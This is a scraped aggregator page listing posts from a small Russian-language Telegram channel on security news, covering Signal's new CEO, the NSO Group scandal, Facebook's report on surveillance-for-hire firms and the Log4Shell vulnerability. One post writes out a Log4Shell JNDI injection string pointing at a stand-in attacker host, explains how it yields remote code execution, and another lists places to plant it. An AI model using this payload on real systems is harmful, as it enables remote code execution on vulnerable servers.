Получи случайную криптовалюту за регистрацию!

Криптосепaратизм и Отвага

Логотип телеграм канала @cryptorebe1s — Криптосепaратизм и Отвага К
Логотип телеграм канала @cryptorebe1s — Криптосепaратизм и Отвага
Адрес канала: @cryptorebe1s
Категории: Технологии
Язык: Русский
Количество подписчиков: 45

Рейтинги и Отзывы

2.67

3 отзыва

Оценить канал cryptorebe1s и оставить отзыв — могут только зарегестрированные пользователи. Все отзывы проходят модерацию.

5 звезд

0

4 звезд

1

3 звезд

1

2 звезд

0

1 звезд

1


Последние сообщения 2

2022-01-11 11:30:47 Брайан Актон, один из сооснователей WhatsApp, стал генеральным директором Signal

https://signal.org/blog/new-year-new-ceo/
43 views08:30
Открыть/Комментировать
2021-12-24 17:24:31 Скандал с NSO набирает обороты. Haaretz пишет, что теперь не только NSO, но и все израильские киберкомпании такого характера, могут оказаться под ударом. Издание пишет, что Израиль "был удивлен" жесткой реакцией американского президента на деятельность NSO.
https://www.haaretz.co.il/news/politics/.premium.HIGHLIGHT-1.10463054
74 views14:24
Открыть/Комментировать
2021-12-21 07:14:11 Тоже интересная история с прошлой недели — про Facebook, который забллокировал 1500 учетных записей, связанных с различными компаниями, занимающимися кибершпионажем. В частности, компаний, которые разрабатывают сервисы, используемые для шпионского наблюдения за активистами, диссидентами, журналистами и тд. Сами учетные записи использовались для наблюдения за жертвами, попыток заманить их в специальные сайты-ловушки, отправки им сообщений для последующего взлома, и тд. Среди таких компаний — компании из Израиля, Китая, Индии и... неожиданно, Северной Македонии. ФБ также планирует разослать предупреждения более 50 тысяч человек, которые могли стать жертвами этих компаний. Среди этих компаий — уже известная читателям этого канала компания NSO Group, также несколько других компаний, основанных или базированных в Израиле —Cobwebs Technologies, Cognyte, Black Cube, Bluehawk CI.

https://about.fb.com/news/2021/12/taking-action-against-surveillance-for-hire/

полная версия отчета ФБ об этой отрасли (PDF)
https://about.fb.com/wp-content/uploads/2021/12/Threat-Report-on-the-Surveillance-for-Hire-Industry.pdf
55 views04:14
Открыть/Комментировать
2021-12-19 17:54:54
Вот читатель прислал
36 views14:54
Открыть/Комментировать
2021-12-17 10:19:29 https://t.co/vpT2eWb2mj
10 views07:19
Открыть/Комментировать
2021-12-15 08:34:55 https://twitter.com/hackerfantastic/status/1470866086199443467?s=21
17 views05:34
Открыть/Комментировать
2021-12-14 14:53:55 https://support.apple.com/en-us/HT212976
20 views11:53
Открыть/Комментировать
2021-12-12 09:17:35 Here are some ideas for potential attack surfaces for Log4J:

in your robots.txt
in your dns records (txt...)
in your email headers
in your usernames
in your passwords
in your headers
in your e-mail addresses
in your files
in your SSL Certificates
in your EXIF
33 viewsedited  06:17
Открыть/Комментировать
2021-12-12 09:17:28 https://venturebeat.com/2021/12/11/vaccine-against-log4shell-vulnerability-has-potential-and-limitations/
23 views06:17
Открыть/Комментировать
2021-12-11 04:46:58 У половины интернета нашли выполнение произвольного кода через Log4j.

Выглядит это так:

1) Посылаем специально сформированный запрос вида ${jndi:ldap://attacker.host/blabla} в любое место, которое потенциально может залогироваться.
2) JNDI (Java Naming and Directory Interface) в свою очередь обрабатывает шаблон, запрашивает данные через LDAP у attacker.host
3) В ответе отдается JAVA класс, который и позволяет выполнить произвольный код.

Гроб. Гроб. Кладбище.
Временный фикс: JAVA_OPTS="-Dlog4j.formatMsgNoLookups=true”

Вот примеры того, что уязвимо (От Cloudflare и Apple до серверов майнкрафта).
18 views01:46
Открыть/Комментировать